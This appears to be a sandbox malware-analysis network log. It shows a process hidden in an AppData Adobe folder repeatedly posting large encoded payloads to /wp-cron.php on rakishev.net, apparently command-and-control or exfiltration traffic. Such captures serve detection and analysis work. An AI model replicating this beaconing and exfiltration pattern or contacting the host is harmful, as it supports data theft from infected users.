Data Ascii: =q2IbBSdcLG/aUbHUmC14nr3GrZYPLe6ozz1%2BbajoTmnk7Tf159%2BelkeMpaKnw%2BwYLwXNKxB8y/F5ztrONihk2IXTBbN6Cd0x0EvQ27OYHnywFVKUWuEy5%2BN55cpQENXHWov2DCZTr7Xj8Rt7uSzcXrra/Y/LltNqOwCTPOoodnontks6Y4OQ5c4O7ujQs6Rpr7vvLIo2W8kuSFV6y2D78jL4pp/C9VQ/abobGFKTM/18LkQgYCc6h8
2023-10-03 20:35:17 UTC	2781	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:35:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f3HoOgQMdxUxvtmlKOvvW4qJ%2Bs%2BDLOZkB8JnlaB1r%2BMq7vb9EaoBv3j42q20GvQOnGV4EqSZTlEJKYHEF854oe0uNNeKhimfHqJq4mcdEeo7F0eviRbo%2ByFHvUsslIk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107f87e1f1058a8-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.4	49910	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:39:00 UTC	4262	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 324 Expect: 100-continue
2023-10-03 20:39:00 UTC	4263	IN	HTTP/1.1 100 Continue
2023-10-03 20:39:00 UTC	4263	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:39:00 UTC	4263	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 6c 4a 38 61 44 37 37 6f 64 30 56 4d 52 62 68 36 45 65 4a 71 6d 6d 34 42 77 57 6f 77 6f 5a 59 45 38 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 6a 79 64 59 Data Ascii: =rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQlJ8aD77od0VMRbh6EeJqmm4BwWowoZYE87T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iSjydY
2023-10-03 20:39:01 UTC	4374	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:39:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vg4VBqaNFe9l048FtD5JkArA8dGYmwrdMCJIlBspsEr%2FPbzAp0YU8qZvompt3xVBseUy1ZmpjLMMKPPWaB5d8TRUa12ESuwagkCtHBYUaZI63q98inIhZ3bQ6MbBpaI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fdf5a81d07b3-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.4	49911	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:39:00 UTC	4262	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 112858 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:39:00 UTC	4263	IN	HTTP/1.1 100 Continue
2023-10-03 20:39:00 UTC	4263	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:39:00 UTC	4263	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 69 33 6a 61 34 75 6c 54 36 6f 48 52 31 71 36 42 74 75 75 42 6e 6f 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 36 70 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGUi3ja4ulT6oHR1q6BtuuBnoIMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey6p
2023-10-03 20:39:00 UTC	4279	OUT	Data Raw: 49 Data Ascii: I
2023-10-03 20:39:00 UTC	4279	OUT	Data Raw: 63 45 5a 69 6b 52 46 63 30 30 34 57 62 41 4c 4a 53 64 71 39 71 4d 58 5a 74 25 32 42 68 45 76 74 4f 4a 58 69 4f 6b 4d 5a 32 6a 36 75 59 70 45 67 67 42 54 44 54 70 4d 32 59 43 2f 52 34 4f 4c 71 44 25 32 42 45 62 70 69 45 76 38 66 79 39 4e 79 55 37 39 31 44 45 48 36 67 55 50 6d 72 4c 67 71 72 4b 69 31 76 6f 62 50 56 76 79 41 38 25 32 42 4f 63 4e 38 79 45 54 41 68 77 6a 49 63 6e 35 68 48 6c 52 53 52 61 57 4f 54 4d 35 6f 6a 37 57 73 37 4e 46 4a 61 4e 38 30 51 75 53 6a 4e 65 73 43 35 37 53 6d 42 4a 51 58 41 55 75 65 4e 51 54 4f 47 71 52 63 68 7a 4d 64 4b 62 39 65 47 57 71 70 6f 4c 67 76 46 79 30 47 57 72 42 58 79 75 51 77 71 63 74 75 4b 66 38 69 4e 46 44 70 52 54 7a 38 67 6b 5a 4b 52 48 4d 39 35 73 53 71 63 25 32 42 6d 6f 6c 74 49 6b 4c 70 59 25 32 42 64 38 52 Data Ascii: cEZikRFc004WbALJSdq9qMXZt%2BhEvtOJXiOkMZ2j6uYpEggBTDTpM2YC/R4OLqD%2BEbpiEv8fy9NyU791DEH6gUPmrLgqrKi1vobPVvyA8%2BOcN8yETAhwjIcn5hHlRSRaWOTM5oj7Ws7NFJaN80QuSjNesC57SmBJQXAUueNQTOGqRchzMdKb9eGWqpoLgvFy0GWrBXyuQwqctuKf8iNFDpRTz8gkZKRHM95sSqc%2BmoltIkLpY%2Bd8R
2023-10-03 20:39:00 UTC	4295	OUT	Data Raw: 6f Data Ascii: o
2023-10-03 20:39:00 UTC	4295	OUT	Data Raw: 47 4e 4e 37 42 66 75 79 59 6a 51 4e 71 42 33 49 78 31 47 67 58 47 49 44 6f 41 43 56 6e 68 62 6a 48 70 25 32 42 58 4e 6b 74 48 4c 42 78 51 4f 53 44 65 38 65 6d 71 44 68 36 4b 4c 25 32 42 59 4a 32 32 52 46 52 38 56 63 6b 34 4c 57 46 30 45 73 4d 55 36 73 72 51 72 25 32 42 63 6d 6a 42 49 77 77 72 73 75 55 70 43 30 30 32 68 75 44 49 52 62 79 38 31 33 32 4d 73 4c 59 79 48 66 61 52 4d 71 49 53 62 64 75 6a 61 71 43 6d 38 4b 6a 67 34 44 44 6a 43 32 31 32 48 25 32 42 32 43 61 79 45 30 36 4a 72 6a 57 7a 47 39 41 4a 38 65 6f 69 73 6e 30 39 59 6b 73 6f 69 68 66 6a 43 58 49 31 6c 4e 43 48 6f 62 54 79 6a 56 57 25 32 42 31 73 36 45 7a 47 30 69 31 47 64 58 66 4a 54 79 54 77 44 72 32 42 59 42 35 39 35 43 52 4d 64 49 79 74 39 37 33 62 61 52 67 38 35 31 48 49 4f 4e 4c 72 68 Data Ascii: GNN7BfuyYjQNqB3Ix1GgXGIDoACVnhbjHp%2BXNktHLBxQOSDe8emqDh6KL%2BYJ22RFR8Vck4LWF0EsMU6srQr%2BcmjBIwwrsuUpC002huDIRby8132MsLYyHfaRMqISbdujaqCm8Kjg4DDjC212H%2B2CayE06JrjWzG9AJ8eoisn09YksoihfjCXI1lNCHobTyjVW%2B1s6EzG0i1GdXfJTyTwDr2BYB595CRMdIyt973baRg851HIONLrh
2023-10-03 20:39:00 UTC	4311	OUT	Data Raw: 42 Data Ascii: B
2023-10-03 20:39:00 UTC	4311	OUT	Data Raw: 57 6c 46 38 70 4c 63 63 4b 67 74 4d 64 64 39 6d 62 4a 6e 34 68 25 32 42 74 75 4f 78 41 6a 64 4f 70 7a 79 62 53 54 68 4d 61 50 4c 4d 39 63 55 75 55 72 71 44 6d 64 34 5a 76 59 25 32 42 42 4b 57 64 39 39 36 31 54 45 34 47 4a 75 4e 6b 5a 4f 38 54 33 6d 4e 6f 6f 50 51 5a 65 55 51 4f 74 30 37 36 67 49 7a 76 47 65 6d 25 32 42 4d 74 6e 6a 64 6a 55 54 58 57 6f 73 47 37 79 6a 4f 56 4a 53 46 43 47 4c 43 79 4a 66 67 53 4b 73 4e 6f 58 37 6a 73 59 42 76 34 38 51 74 75 4c 58 62 4f 4b 61 39 35 64 47 73 71 6f 74 70 55 6a 67 5a 58 78 5a 5a 6b 68 6b 35 76 32 6d 35 79 75 39 4e 52 31 39 6f 33 6e 63 73 35 4b 64 72 6b 31 65 6a 74 61 53 4f 6b 66 4f 4d 33 6c 64 44 79 6b 43 35 36 35 4e 58 6f 37 57 6b 6a 70 48 7a 6a 4e 35 58 51 38 70 41 75 65 75 54 56 36 4f 31 70 49 36 52 38 34 7a Data Ascii: WlF8pLccKgtMdd9mbJn4h%2BtuOxAjdOpzybSThMaPLM9cUuUrqDmd4ZvY%2BBKWd9961TE4GJuNkZO8T3mNooPQZeUQOt076gIzvGem%2BMtnjdjUTXWosG7yjOVJSFCGLCyJfgSKsNoX7jsYBv48QtuLXbOKa95dGsqotpUjgZXxZZkhk5v2m5yu9NR19o3ncs5Kdrk1ejtaSOkfOM3ldDykC565NXo7WkjpHzjN5XQ8pAueuTV6O1pI6R84z
2023-10-03 20:39:00 UTC	4327	OUT	Data Raw: 6b Data Ascii: k
2023-10-03 20:39:00 UTC	4327	OUT	Data Raw: 6b 6a 69 6f 46 36 49 76 6d 71 72 48 4a 74 79 79 4a 5a 47 46 43 43 75 32 48 64 62 35 41 43 78 56 52 6f 56 25 32 42 37 73 76 77 25 32 42 37 33 6f 7a 42 34 4a 36 33 4c 75 71 54 79 36 53 4b 67 34 52 42 45 38 67 64 64 47 65 4d 41 75 73 6a 76 77 59 6e 30 4f 71 49 74 6b 48 39 35 56 53 47 62 46 73 75 58 55 50 75 6e 62 25 32 42 33 52 78 5a 73 30 68 36 6d 55 63 35 66 51 75 6b 70 71 4d 4c 6d 71 2f 53 52 6c 74 48 62 43 57 51 51 47 33 78 6e 38 76 4c 58 2f 30 4a 62 43 44 68 67 59 63 59 42 61 38 36 6a 39 5a 47 50 39 43 47 35 32 4c 42 75 4b 67 32 6d 32 48 31 38 42 49 4f 55 6f 74 7a 64 51 75 73 7a 47 65 78 6e 25 32 42 50 45 58 53 49 49 43 67 30 42 33 67 45 4f 44 4b 36 63 66 61 6a 66 68 51 44 53 49 71 4c 25 32 42 55 67 4f 6b 61 77 70 79 6c 75 52 59 78 49 51 37 77 58 30 38 Data Ascii: kjioF6IvmqrHJtyyJZGFCCu2Hdb5ACxVRoV%2B7svw%2B73ozB4J63LuqTy6SKg4RBE8gddGeMAusjvwYn0OqItkH95VSGbFsuXUPunb%2B3RxZs0h6mUc5fQukpqMLmq/SRltHbCWQQG3xn8vLX/0JbCDhgYcYBa86j9ZGP9CG52LBuKg2m2H18BIOUotzdQuszGexn%2BPEXSIICg0B3gEODK6cfajfhQDSIqL%2BUgOkawpyluRYxIQ7wX08
2023-10-03 20:39:00 UTC	4343	OUT	Data Raw: 4b Data Ascii: K
2023-10-03 20:39:00 UTC	4343	OUT	Data Raw: 74 53 74 7a 55 6a 70 34 69 4e 61 42 37 25 32 42 6b 5a 4d 42 4f 79 57 33 56 35 74 30 51 67 64 33 49 33 33 39 63 49 25 32 42 47 66 52 4f 46 43 79 33 25 32 42 51 48 70 72 32 5a 46 6d 25 32 42 66 45 51 4b 4f 73 71 69 34 54 33 37 62 75 2f 76 25 32 42 66 6c 52 74 48 4d 33 6b 76 39 59 68 72 25 32 42 78 68 74 73 49 48 42 59 5a 56 64 70 51 45 32 6d 44 54 75 4e 55 44 72 4b 2f 4f 39 38 31 61 46 47 4c 71 44 33 55 2f 42 54 58 37 4c 45 53 70 4b 32 6c 61 43 33 42 75 7a 4b 51 4a 61 51 68 55 67 42 6d 41 37 57 4b 25 32 42 41 61 71 31 5a 6f 58 79 39 57 6e 44 64 51 70 36 49 25 32 42 42 32 4e 25 32 42 55 65 61 43 62 31 76 6f 32 56 77 47 68 51 4a 34 30 6d 42 2f 67 6d 48 35 33 45 35 66 4a 67 74 73 62 4c 6d 25 32 42 76 58 73 4c 46 4b 67 43 4a 4b 56 42 62 53 54 45 4c 46 4b 6f 39 Data Ascii: tStzUjp4iNaB7%2BkZMBOyW3V5t0Qgd3I339cI%2BGfROFCy3%2BQHpr2ZFm%2BfEQKOsqi4T37bu/v%2BflRtHM3kv9Yhr%2BxhtsIHBYZVdpQE2mDTuNUDrK/O981aFGLqD3U/BTX7LESpK2laC3BuzKQJaQhUgBmA7WK%2BAaq1ZoXy9WnDdQp6I%2BB2N%2BUeaCb1vo2VwGhQJ40mB/gmH53E5fJgtsbLm%2BvXsLFKgCJKVBbSTELFKo9
2023-10-03 20:39:00 UTC	4359	OUT	Data Raw: 75 Data Ascii: u
2023-10-03 20:39:00 UTC	4359	OUT	Data Raw: 43 4c 69 2f 4d 59 71 38 67 4a 58 34 35 45 49 56 79 6a 36 38 69 71 44 25 32 42 52 70 70 6c 37 76 51 62 31 56 38 39 75 68 55 32 75 44 72 31 72 66 31 38 6b 6a 6a 56 46 68 69 6c 69 74 61 5a 39 47 7a 6a 32 34 56 42 77 53 32 71 2f 59 39 78 42 7a 54 59 4f 4e 6d 72 6e 68 71 52 37 55 50 54 6d 46 70 4b 52 44 44 78 47 55 38 59 30 36 62 32 49 53 61 4f 76 59 4b 46 72 50 33 49 31 6d 53 38 74 33 45 4c 76 52 57 45 37 63 34 77 6d 55 47 48 36 6d 58 35 4d 6d 65 69 33 52 50 65 4a 56 74 4f 58 6d 31 58 25 32 42 48 6f 71 7a 73 44 44 6d 57 6a 54 74 63 41 43 58 35 32 52 6b 6c 37 6e 6d 4d 7a 64 57 68 6b 61 6c 62 50 66 76 4e 31 63 65 4a 42 52 37 79 45 33 5a 6d 55 65 67 44 6f 68 56 53 73 75 49 4a 4b 69 44 51 65 47 7a 48 62 74 42 76 54 48 73 34 6e 74 55 75 61 25 32 42 6b 46 32 5a 61 Data Ascii: CLi/MYq8gJX45EIVyj68iqD%2BRppl7vQb1V89uhU2uDr1rf18kjjVFhilitaZ9Gzj24VBwS2q/Y9xBzTYONmrnhqR7UPTmFpKRDDxGU8Y06b2ISaOvYKFrP3I1mS8t3ELvRWE7c4wmUGH6mX5Mmei3RPeJVtOXm1X%2BHoqzsDDmWjTtcACX52Rkl7nmMzdWhkalbPfvN1ceJBR7yE3ZmUegDohVSsuIJKiDQeGzHbtBvTHs4ntUua%2BkF2Za
2023-10-03 20:39:01 UTC	4375	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:39:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vuj1wrM2g3%2BgHCZpHs9Nn6b%2F8iyUS4qO0%2F0aoTqdsAf1bbXdAS0cIQGtLzGbT90a49%2BLtf1nf8a2%2FbP%2Fr8%2BwfjxGNbVLHi%2FwdWa6Nfw7ESaLFXDCt5MFQA1UYVg4YD0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fdf67c6e2d0b-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.4	49913	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:39:01 UTC	4374	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue
2023-10-03 20:39:01 UTC	4375	IN	HTTP/1.1 100 Continue
2023-10-03 20:39:01 UTC	4375	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:39:01 UTC	4375	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem
2023-10-03 20:39:01 UTC	4376	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:39:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6tPQmS7%2FEyZwbbHlAncDSvJJegHBZstyPWikHW5VUX2srdFLkQhVDPkVu8ZnePoudsyKPerTqbI7mnP9paOIygeX9W8qyhOmuMSUOwYRCF7dk7pdXJiycjuvYALAFRw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fdf9ff7c20a8-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.4	49912	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:39:01 UTC	4374	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 324 Expect: 100-continue
2023-10-03 20:39:01 UTC	4375	IN	HTTP/1.1 100 Continue
2023-10-03 20:39:01 UTC	4375	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:39:01 UTC	4375	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 6c 4a 38 61 44 37 37 6f 64 30 56 4d 52 62 68 36 45 65 4a 71 6d 6d 34 42 77 57 6f 77 6f 5a 59 45 38 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 6a 79 64 59 Data Ascii: =rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQlJ8aD77od0VMRbh6EeJqmm4BwWowoZYE87T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iSjydY
2023-10-03 20:39:01 UTC	4377	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:39:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TFaiPJtGcULAgXYTK6QShBLxeyswhKfFmJXHe2dPY0P1r4PekVo%2FdkRmcJOkqIFxMkv33Pny6KyjUXb5pP7FArtA9SEKJG8WtHpWesVQOshFJI9sV8kAgUXKSRxdawA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fdfa098f82ab-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.4	49914	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:39:02 UTC	4377	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 112878 Expect: 100-continue
2023-10-03 20:39:02 UTC	4378	IN	HTTP/1.1 100 Continue
2023-10-03 20:39:02 UTC	4378	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:39:02 UTC	4378	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 69 33 6a 61 34 75 6c 54 36 6f 48 52 31 71 36 42 74 75 75 42 6e 6f 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 36 70 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGUi3ja4ulT6oHR1q6BtuuBnoIMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey6p
2023-10-03 20:39:02 UTC	4393	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:39:02 UTC	4393	OUT	Data Raw: 77 77 54 62 34 6e 47 79 43 35 73 75 71 61 57 6e 4c 49 67 74 6d 72 65 54 44 56 25 32 42 67 68 47 2f 31 63 57 55 51 66 75 36 62 56 6a 56 45 47 45 42 4a 6d 63 52 69 6d 43 33 35 6d 44 6f 47 77 4f 39 51 64 46 47 65 52 30 70 64 4d 56 5a 4e 25 32 42 73 4d 52 46 4f 75 57 41 44 39 2f 79 4a 57 48 62 36 71 35 4d 32 36 75 33 31 45 56 4a 35 35 6b 69 46 6d 50 63 76 6d 4d 59 51 4d 57 69 46 59 25 32 42 68 67 25 32 42 4d 6a 73 55 32 79 62 78 6e 48 79 37 74 78 48 78 4b 41 71 64 73 50 6e 48 63 67 2f 2f 4a 41 69 53 77 33 32 63 63 41 72 4d 70 61 68 68 57 74 59 31 50 77 52 50 64 4f 71 70 62 4d 71 74 74 4e 59 4d 55 6a 77 6a 34 4e 30 30 52 31 39 76 47 6d 67 5a 53 47 4d 63 4c 2f 64 44 6c 6a 79 68 75 6f 48 44 70 42 78 68 6c 45 6d 37 48 35 34 58 67 73 7a 51 42 66 47 35 70 50 35 44 Data Ascii: wwTb4nGyC5suqaWnLIgtmreTDV%2BghG/1cWUQfu6bVjVEGEBJmcRimC35mDoGwO9QdFGeR0pdMVZN%2BsMRFOuWAD9/yJWHb6q5M26u31EVJ55kiFmPcvmMYQMWiFY%2Bhg%2BMjsU2ybxnHy7txHxKAqdsPnHcg//JAiSw32ccArMpahhWtY1PwRPdOqpbMqttNYMUjwj4N00R19vGmgZSGMcL/dDljyhuoHDpBxhlEm7H54XgszQBfG5pP5D
2023-10-03 20:39:02 UTC	4409	OUT	Data Raw: 37 Data Ascii: 7
